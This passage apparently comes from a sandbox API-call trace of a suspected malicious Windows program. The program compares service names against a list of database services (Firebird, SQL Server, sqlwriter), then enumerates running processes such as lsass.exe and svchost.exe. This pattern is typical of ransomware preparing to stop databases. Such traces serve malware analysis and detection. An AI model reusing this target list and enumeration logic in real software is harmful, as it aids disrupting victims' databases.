lpString2="KeyIso") returned 1 [0195.170] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0195.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0195.170] lstrlenW (lpString="LanmanServer") returned 12 [0195.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0195.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0195.170] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0195.170] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0195.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0195.170] lstrlenW (lpString="LanmanWorkstation") returned 17 [0195.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0195.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0195.170] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0195.170] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0195.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0195.170] lstrlenW (lpString="lfsvc") returned 5 [0195.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0195.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0195.170] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0195.170] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0195.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0195.170] lstrlenW (lpString="LicenseManager") returned 14 [0195.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0195.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0195.170] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0195.170] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0195.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0195.170] lstrlenW (lpString="lmhosts") returned 7 [0195.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0195.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0195.171] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0195.171] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0195.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0195.171] lstrlenW (lpString="LSM") returned 3 [0195.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0195.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0195.171] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0195.171] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0195.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0195.171] lstrlenW (lpString="MpsSvc") returned 6 [0195.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0195.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0195.171] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0195.171] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0195.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0195.171] lstrlenW (lpString="NcbService") returned 10 [0195.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0195.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0195.171] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0195.171] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0195.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0195.171] lstrlenW (lpString="netprofm") returned 8 [0195.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0195.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0195.171] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0195.171] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0195.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0195.171] lstrlenW (lpString="NlaSvc") returned 6 [0195.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0195.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0195.172] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0195.172] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0195.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0195.172] lstrlenW (lpString="nsi") returned 3 [0195.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0195.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0195.172] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0195.172] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0195.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0195.172] lstrlenW (lpString="PcaSvc") returned 6 [0195.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0195.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0195.172] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0195.172] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0195.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0195.172] lstrlenW (lpString="PlugPlay") returned 8 [0195.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0195.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0195.172] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0195.172] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0195.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0195.172] lstrlenW (lpString="Power") returned 5 [0195.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0195.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0195.172] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0195.172] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0195.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0195.172] lstrlenW (lpString="ProfSvc") returned 7 [0195.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0195.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0195.560] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0195.560] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0195.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0195.560] lstrlenW (lpString="RpcEptMapper") returned 12 [0195.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0195.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0195.560] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0195.560] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0195.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0195.561] lstrlenW (lpString="RpcSs") returned 5 [0195.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0195.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0195.561] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0195.561] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0195.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0195.561] lstrlenW (lpString="SamSs") returned 5 [0195.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0195.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0195.561] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0195.561] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0195.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0195.561] lstrlenW (lpString="Schedule") returned 8 [0195.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0195.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0195.561] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0195.562] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0195.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0195.562] lstrlenW (lpString="SecurityHealthService") returned 21 [0195.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0195.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0195.562] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0195.562] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0195.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0195.562] lstrlenW (lpString="SENS") returned 4 [0195.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0195.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0195.562] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0195.562] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0195.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0195.562] lstrlenW (lpString="ShellHWDetection") returned 16 [0195.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0195.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0195.563] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0195.563] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0195.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0195.563] lstrlenW (lpString="Spooler") returned 7 [0195.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0195.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0195.563] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0195.563] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0195.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0195.563] lstrlenW (lpString="sppsvc") returned 6 [0195.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0195.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0195.563] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0195.563] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0195.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0195.564] lstrlenW (lpString="SSDPSRV") returned 7 [0195.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0195.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0195.564] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0195.564] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0195.564] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3ac [0195.572] Process32FirstW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.573] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0195.574] lstrlenW (lpString="System") returned 6 [0195.574] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0195.575] lstrlenW (lpString="smss.exe") returned 8 [0195.575] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.576] lstrlenW (lpString="csrss.exe") returned 9 [0195.576] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0195.577] lstrlenW (lpString="wininit.exe") returned 11 [0195.577] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.578] lstrlenW (lpString="csrss.exe") returned 9 [0195.578] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0195.579] lstrlenW (lpString="winlogon.exe") returned 12 [0195.579] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0195.580] lstrlenW (lpString="services.exe") returned 12 [0195.580] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0195.581] lstrlenW (lpString="lsass.exe") returned 9 [0195.581] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.582] lstrlenW (lpString="svchost.exe") returned 11 [0195.582] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0195.583] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0195.583] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0195.584] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0195.584] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.585] lstrlenW (lpString="svchost.exe") returned 11 [0195.585] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0195.586] lstrlenW (lpString="dwm.exe") returned 7 [0195.586] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.587] lstrlenW (lpString="svchost.exe") returned 11 [0195.587] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.588] lstrlenW (lpString="svchost.exe") returned 11 [0195.588] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.589] lstrlenW (lpString="svchost.exe") returned 11 [0195.589] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.590] lstrlenW (lpString="svchost.exe") returned 11 [0195.590] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.591] lstrlenW (lpString="svchost.exe") returned 11 [0195.591] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.592] lstrlenW (lpString="svchost.exe") returned 11 [0195.592] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.593] lstrlenW (lpString="svchost.exe") returned 11 [0195.593] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.594] lstrlenW (lpString="svchost.exe") returned 11 [0195.594] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.816] lstrlenW (lpString="svchost.exe") returned 11 [0195.816] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0195.817] lstrlenW (lpString="spoolsv.exe") returned 11 [0195.817] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.818] lstrlenW (lpString="svchost.exe") returned 11 [0195.818] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.819] lstrlenW (lpString="svchost.exe") returned 11 [0195.819] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0195.820] lstrlenW (lpString="audiodg.exe") returned 11 [0195.820] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0195.821] lstrlenW (lpString="sihost.exe") returned 10 [0195.821] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.822] lstrlenW (lpString="svchost.exe") returned 11 [0195.822] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0195.823] lstrlenW (lpString="taskhostw.exe") returned 13 [0195.823] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0195.824] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0195.824] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0195.825] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0195.825] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3a, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.826] lstrlenW (lpString="explorer.exe") returned 12 [0195.826] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0195.827] lstrlenW (lpString="Memory Compression") returned 18 [0195.827] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0195.828] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0195.828] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0195.829] lstrlenW (lpString="SearchUI.exe") returned 12 [0195.829] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0195.830] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0195.830] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0195.831] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0195.831] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0195.832] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0195.832] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: 